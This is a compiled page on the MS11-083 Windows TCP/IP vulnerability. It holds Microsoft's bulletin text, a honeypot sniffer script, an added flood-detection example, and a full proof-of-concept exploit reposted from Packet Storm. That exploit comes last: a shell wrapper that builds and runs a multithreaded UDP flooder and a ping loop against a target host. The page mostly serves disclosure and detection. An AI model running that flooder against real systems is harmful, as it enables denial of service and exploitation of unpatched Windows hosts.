Microsoft Security Bulletin MS11-083 - Critical
Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Executive Summary
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.
The security update addresses the vulnerability by modifying the way that the Windows TCP/IP stack keeps track of UDP packets within memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.
For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service. See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.
Known Issues. None
Affected and Non-Affected Software
The following software has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.
Affected Software
*Server Core installation affected.
This update applies, with the same severity rating, to supported
editions of Windows Server 2008 or Windows Server 2008 R2 as indicated,
whether or not installed using the Server Core installation option. For
more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation.
Note that the Server Core installation option does not apply to certain
editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.
Non-Affected Software
| Operating System |
| Windows XP Service Pack 3 |
| Windows XP Professional x64 Edition Service Pack 2 |
| Windows Server 2003 Service Pack 2 |
| Windows Server 2003 x64 Edition Service Pack 2 |
| Windows Server 2003 with SP2 for Itanium-based Systems |
Frequently Asked Questions (FAQ) Related to This Security Update
Severity Ratings and Vulnerability Identifiers
The following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the November bulletin summary. For more information, see Microsoft Exploitability Index.
Vulnerability Severity Rating and Maximum Security Impact by Affected Software
| Affected Software | Reference Counter Overflow Vulnerability - CVE-2011-2013 | Aggregate Severity Rating |
| Windows Vista Service Pack 2 | Critical Remote Code Execution | Critical |
| Windows Vista x64 Edition Service Pack 2 | Critical Remote Code Execution | Critical |
| Windows Server 2008 for 32-bit Systems Service Pack 2* | Critical Remote Code Execution | Critical |
| Windows Server 2008 for x64-based Systems Service Pack 2* | Critical Remote Code Execution | Critical |
| Windows Server 2008 for Itanium-based Systems Service Pack 2 | Critical Remote Code Execution | Critical |
| Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1 | Critical Remote Code Execution | Critical |
| Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1 | Critical Remote Code Execution | Critical |
| Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems Service Pack 1* | Critical Remote Code Execution | Critical |
| Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 | Critical Remote Code Execution | Critical |
Detection and Deployment Guidance
Microsoft provides detection and deployment guidance for security updates. This guidance contains recommendations and information that can help IT professionals understand how to use various tools for detection and deployment of security updates. For more information, see Microsoft Knowledge Base Article 961747.
Microsoft Baseline Security Analyzer
Microsoft Baseline Security Analyzer (MBSA) allows administrators to scan local and remote systems for missing security updates as well as common security misconfigurations. For more information about MBSA, visit Microsoft Baseline Security Analyzer.
The following table provides the MBSA detection summary for this security update.
| Software | MBSA |
| Windows Vista Service Pack 2 | Yes |
| Windows Vista x64 Edition Service Pack 2 | Yes |
| Windows Server 2008 for 32-bit Systems Service Pack 2 | Yes |
| Windows Server 2008 for x64-based Systems Service Pack 2 | Yes |
| Windows Server 2008 for Itanium-based Systems Service Pack 2 | Yes |
| Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1 | Yes |
| Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1 | Yes |
| Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems Service Pack 1 | Yes |
| Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 | Yes |
Note: For customers using legacy software not supported by the latest release of MBSA, Microsoft Update, and Windows Server Update Services, please visit Microsoft Baseline Security Analyzer and reference the Legacy Product Support section on how to create comprehensive security update detection with legacy tools.
Update Compatibility Evaluator and Application Compatibility Toolkit
Updates often write to the same files and registry settings required for your applications to run. This can trigger incompatibilities and increase the time it takes to deploy security updates. You can streamline testing and validating Windows updates against installed applications with the Update Compatibility Evaluator components included with Application Compatibility Toolkit.
The Application Compatibility Toolkit (ACT) contains the necessary tools and documentation to evaluate and mitigate application compatibility issues before deploying Microsoft Windows Vista, a Windows Update, a Microsoft Security Update, or a new version of Windows Internet Explorer in your environment.
Source: https://technet.microsoft.com/en-us/security/bulletin/ms11-083
Honeypot For MS11-083
MS11-083 has arrived and people are getting both excited and scared; it looks like it's going to be the next MS08-067, which, if you remember, Conficker used to bend Windows over and have a jol. Time for a honeypot?
In any case I took a moment and decided to write a script that would capture potential MS11-083 traffic, in an attempt to capture this exploit in the wild (once it's out there, might as well start looking).
According to the security bulletin, “The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system”. So that's exactly what I looked at: I used netstat -un and -lun to find all open and listening ports and filtered them out. UDP packets to a closed port normally result in an ICMP Port Unreachable response or no response at all, so I've ignored them.
The code is commented and you need the little bash script in the same folder to get the ports. Remember to make it executable (sudo chmod +x getports.sh) and run ms11-083_sniffer.py as root. It will create a pcap file named <current datetime>.pcap, and any UDP traffic heading towards a closed port will be logged.
Once you have some pcaps and you think they might contain exploit traffic, remember that sharing is caring and karma is a bitch; don't share if it was just Chuck Testa. My code is dirty and I wrote it quickly, so don't hate; feel free to modify and make it better.
I'll try and add my nmap enumeration script tomorrow; it does a port scan and OS fingerprint on a given host and inserts that data into a SQLite DB. That way you can check if the traffic was coming from a Windows host.
ms11-083_sniffer.py
getports.sh
With the bash script, just remove the .txt file extension (my hosting is being annoying). Below is the code if you want to have a peek.
from pcapy import *
from impacket import ImpactDecoder, ImpactPacket
from socket import *
import fcntl
import struct
import os
import time


class Sniffer:
    def __init__(self):
        self.promiscuous = True
        self.called = 0  # silly habits: flipped to 1 once the pcap dumper has been opened
        self.interface = 'eth0'
        self.max_bytes = 65535  # Theoretical max size for a UDP packet
        self.read_timeout = 100
        self.portlist = []  # open/listening UDP ports, filled by refresh_portlist()
        self.ip = self.get_ip_address(self.interface)
        self.bpf = 'ip dst host %s and not src net 192.168.1.0/30' % self.ip
        print("\n---------------------------------------------------")
        print("Sniffing for unsolicited UDP packets to closed ports.")
        print(" \"Open ports are for losers\" - MS11-083")
        print("Pcap log started, listening from %s" % time.strftime("%d:%m:%Y %H:%M:%S", time.localtime()))
        print("---------------------------------------------------")

    def get_ip_address(self, ifname):
        # SIOCGIFADDR (0x8915) on a throwaway socket returns the interface's IPv4 address
        s = socket(AF_INET, SOCK_STREAM)
        return inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', ifname[:15]))[20:24])

    def start(self):
        self.reader = open_live(self.interface, self.max_bytes, self.promiscuous, self.read_timeout)
        # Pcapy uses BPF to filter packets. "not src net 192.168.1.0/30"
        # should be changed; it just filters out 1.0, 1.1, 1.2 and 1.3,
        # which I use for different gateways and don't want traffic
        # from the router hitting the logs.
        self.reader.setfilter(self.bpf)
        # Run the packet capture loop (0 = keep capturing until killed)
        self.reader.loop(0, self.callback)

    def callonce(self):
        # Open the pcap dump file on the first logged packet only
        self.dumper = self.reader.dump_open(time.strftime("%d-%m-%Y_%H-%M-%S.pcap", time.localtime()))
        self.called = 1

    def callback(self, hdr, data):
        # Parse the Ethernet frame
        decoder = ImpactDecoder.EthDecoder()
        ether = decoder.decode(data)
        # Parse the IP packet inside the Ethernet frame, then its payload
        iphdr = ether.child()
        udphdr = iphdr.child()
        # First check that the packet is not coming from the local host,
        # then check that it is a UDP packet (in case you changed the BPF), and
        # check that the destination port of the packet is a closed port on the host
        if iphdr.get_ip_src() != self.ip:
            self.refresh_portlist()
            if iphdr.get_ip_p() == ImpactPacket.UDP.protocol and udphdr.get_uh_dport() not in self.portlist:
                if self.called == 0:
                    self.callonce()
                print("Incoming UDP packet from %s" % iphdr.get_ip_src())
                self.dumper.dump(hdr, data)

    def refresh_portlist(self):
        # bash script to get all the open and listening UDP ports (one per line),
        # used in the callback function as criteria for logging traffic
        output = os.popen("./getports.sh")
        self.portlist = []
        for p in output.readlines():
            p = p.strip()
            if p.isdigit():  # skip blank lines so a stray newline does not crash the sniffer
                self.portlist.append(int(p))


def main():
    snf = Sniffer()
    snf.start()


if __name__ == "__main__":
    main()
Source: http://www.securityaegis.com/honey-potting-for-ms11-083/
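The sniffer above depends on getports.sh, which is not reproduced on the page, and it records every single datagram to a closed port, whereas the bulletin's precondition is a continuous flow. What follows is an added example written for this page; it is not code from the securityaegis post or from Microsoft. It parses netstat -lun output into the listening-port set the sniffer expects from getports.sh (assuming that script prints one port number per line, which is what refresh_portlist reads), and then counts inbound datagrams per source and closed port over a time window, so that a single late DNS reply to an ephemeral port is logged but not flagged while a sustained flood from one source is. The netstat text, the addresses and ports, and the threshold and window values are constructed for the example and are not taken from a real capture or from the bulletin.

```python
"""Added example: classify inbound UDP datagrams against the host's listening
UDP sockets and flag a sustained flood to one closed port, the condition the
MS11-083 bulletin describes.  Not code from the securityaegis post or from
Microsoft; the netstat text and the packet stream below are constructed."""
from collections import defaultdict, deque

# Constructed sample of "netstat -lun" output on Linux (not a real capture).
SAMPLE_NETSTAT_LUN = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 127.0.0.1:53            0.0.0.0:*
udp        0      0 192.168.1.10:123        0.0.0.0:*
udp6       0      0 :::5353                 :::*
"""


def parse_listening_udp_ports(netstat_text):
    """Return the set of UDP ports that have a listening socket.

    Parses "netstat -lun" output; this is the set the sniffer expects from
    getports.sh (assumed to print one port number per line)."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        # data rows start with udp/udp6; the banner and header rows do not
        if len(fields) < 4 or not fields[0].startswith("udp"):
            continue
        # Local Address is "addr:port"; rsplit handles IPv6 forms like ":::5353"
        port = fields[3].rsplit(":", 1)[-1]
        if port.isdigit():
            ports.add(int(port))
    return ports


class ClosedPortFloodDetector:
    """Per-(source, destination port) counter for UDP to ports with no listener.

    observe() returns "open" for a port with a listener, "logged" for a
    datagram to a closed port (what the post's sniffer records), and "flood"
    once `threshold` datagrams from one source to one closed port have been
    seen within the last `window` seconds.  Threshold and window are
    assumptions for the example, not values from the bulletin."""

    def __init__(self, listening_ports, threshold=1000, window=10.0):
        self.listening = set(listening_ports)
        self.threshold = threshold
        self.window = window
        self._hits = defaultdict(deque)  # (src, dport) -> timestamps in window

    def refresh(self, listening_ports):
        """Replace the listening-port snapshot (call on a timer, not per packet)."""
        self.listening = set(listening_ports)

    def observe(self, ts, src, dport):
        """Classify one inbound UDP datagram; ts is seconds (pcap header time)."""
        if dport in self.listening:
            return "open"
        stamps = self._hits[(src, dport)]
        stamps.append(ts)
        cutoff = ts - self.window
        while stamps and stamps[0] < cutoff:  # age out hits older than the window
            stamps.popleft()
        return "flood" if len(stamps) >= self.threshold else "logged"


def run_sample():
    """Replay a constructed inbound UDP stream and count each classification."""
    det = ClosedPortFloodDetector(parse_listening_udp_ports(SAMPLE_NETSTAT_LUN),
                                  threshold=1000, window=10.0)
    events = [
        (0.0, "192.0.2.1", 123),        # NTP to a listening port: open
        (0.5, "198.51.100.9", 41234),   # late DNS reply to an ephemeral port: logged once, not a flood
    ]
    # one source sends 1200 datagrams to closed port 1337 in six seconds
    events += [(1.0 + i * 0.005, "203.0.113.5", 1337) for i in range(1200)]
    counts = {"open": 0, "logged": 0, "flood": 0}
    for ts, src, dport in events:
        counts[det.observe(ts, src, dport)] += 1
    return counts


if __name__ == "__main__":
    print(run_sample())  # {'open': 1, 'logged': 1000, 'flood': 201}
```

Two things the sniffer as posted does not handle, and which this example is shaped around: refresh_portlist() shells out to getports.sh for every inbound packet not sent by the host itself, so under the very flood it is meant to catch the shell-out dominates the capture loop; and the port list is a snapshot, so a reply to an ephemeral socket that closed between two refreshes looks like traffic to a closed port. Refreshing the listening set on a timer and keeping a per-source, per-port count over a window is what separates that noise from the sustained flow the bulletin describes.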
PoC Code From packetstormsecurity.org
#!/bin/sh
# Writes winnuke2011.c and ping.sh into the current directory, builds the PoC
# and runs it with the arguments given to this wrapper: <server> <port>
cat > winnuke2011.c << 'EOF'
/*
 * MS11-083 DoS/PoC exploit
 * ========================
 * This attempts to trigger the ICMP refCount overflow
 * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
 * requires sending 2^32 UDP packets to a host on a closed
 * port, or 4,294,967,296 packets. A dereference function
 * must be called that is not triggered via UDP but ICMP
 * echo packets. This exploit creates 250 threads and
 * floods a host with UDP packets and then attempts to
 * trigger the de-ref using ping. I calculated that it
 * would take approximately 52 days for the host to
 * enter a condition where this vulnerability is
 * triggerable.
 *
 * -- prdelka
 */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <sys/time.h>

int port;
volatile int active = 0;                               /* flood threads still running */
pthread_mutex_t mutexactive = PTHREAD_MUTEX_INITIALIZER; /* guards active */

void *sendpackets(void *ptr);

int main(int argc, char *argv[]) {
    pthread_t thread;
    int iret, lthreads;
    pid_t pid;

    printf("[+] MS11-083 DoS/PoC exploit\n");
    if (argc < 3) {
        printf("[!] Usage : %s <server> <port>\n", argv[0]);
        exit(1);
    }
    char *const args[] = {"ping", argv[1], NULL};
    char *const envp[] = {"", NULL};
    port = atoi(argv[2]);

    for (lthreads = 0; lthreads < 250; lthreads++) {   /* UDP flood */
        iret = pthread_create(&thread, NULL, sendpackets, argv[1]);
        if (iret != 0) {
            printf("[!] Cannot create thread %d\n", lthreads);
            exit(1);
        }
        printf("[-] Thread number %d started\n", lthreads);
        sleep(1);
    }
    printf("[-] One does not simply barrel roll into Mordor\n");

    pid = fork();
    if (pid == 0) {                                     /* trigger deref. */
        execve("./ping.sh", args, envp);
        perror("execve");                               /* only reached if exec failed */
        _exit(1);
    }
    while (active) {                                    /* wait for the flood threads */
        sleep(1);
    }
    printf("[-] You are finished. Patience is a virtue.\n");
    exit(0);
}

void *sendpackets(void *ptr) {
    int sd, rc, flags;
    unsigned long i;
    struct sockaddr_in remoteServAddr;
    struct hostent *h;
    char str[41];

    pthread_mutex_lock(&mutexactive);
    active++;
    pthread_mutex_unlock(&mutexactive);

    /* 40 bytes of random printable-ish junk as the datagram payload */
    srand(time(NULL));
    for (i = 0; i < 40; ++i) {
        str[i] = (char)((rand() % 78) + 30);
    }
    str[40] = '\0'; /* yes this was off-by-one. :( */
    printf("[-] Sending payload '%s'\n", str);

    h = gethostbyname(ptr);
    if (h == NULL) {
        printf("unknown host '%s' \n", (char *)ptr);
        exit(1);
    }
    memset(&remoteServAddr, 0, sizeof(remoteServAddr));
    remoteServAddr.sin_family = h->h_addrtype;
    memcpy(&remoteServAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
    remoteServAddr.sin_port = htons(port);

    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sd < 0) {
        printf("[!] Cannot open socket\n");
        pthread_mutex_lock(&mutexactive);
        active--;
        pthread_mutex_unlock(&mutexactive);
        pthread_exit((void *)0);
    }
    flags = 0;
    /* 2^32 - 1 datagrams per thread to the (closed) target port */
    for (i = 0; i < 4294967295UL; i++) {
        rc = sendto(sd, str, strlen(str) + 1, flags,
                    (struct sockaddr *)&remoteServAddr, sizeof(remoteServAddr));
        if (rc < 0) {
            printf("[!] Cannot send data\n");
            close(sd);
            /* decrement active on the error path too, otherwise main waits forever */
            pthread_mutex_lock(&mutexactive);
            active--;
            pthread_mutex_unlock(&mutexactive);
            pthread_exit((void *)0);
        }
    }
    close(sd);
    pthread_mutex_lock(&mutexactive);
    active--;
    pthread_mutex_unlock(&mutexactive);
    pthread_exit(NULL);
}
EOF
cat > ping.sh << 'EOF'
#!/bin/sh
# Hammer the target with ICMP echo requests to reach the dereference path
while true; do /sbin/ping -c 1 "$1"; done
EOF
chmod +x ping.sh
gcc winnuke2011.c -o winnuke2011 -lpthread
./winnuke2011 "$@"
Source: http://packetstormsecurity.org/files/106873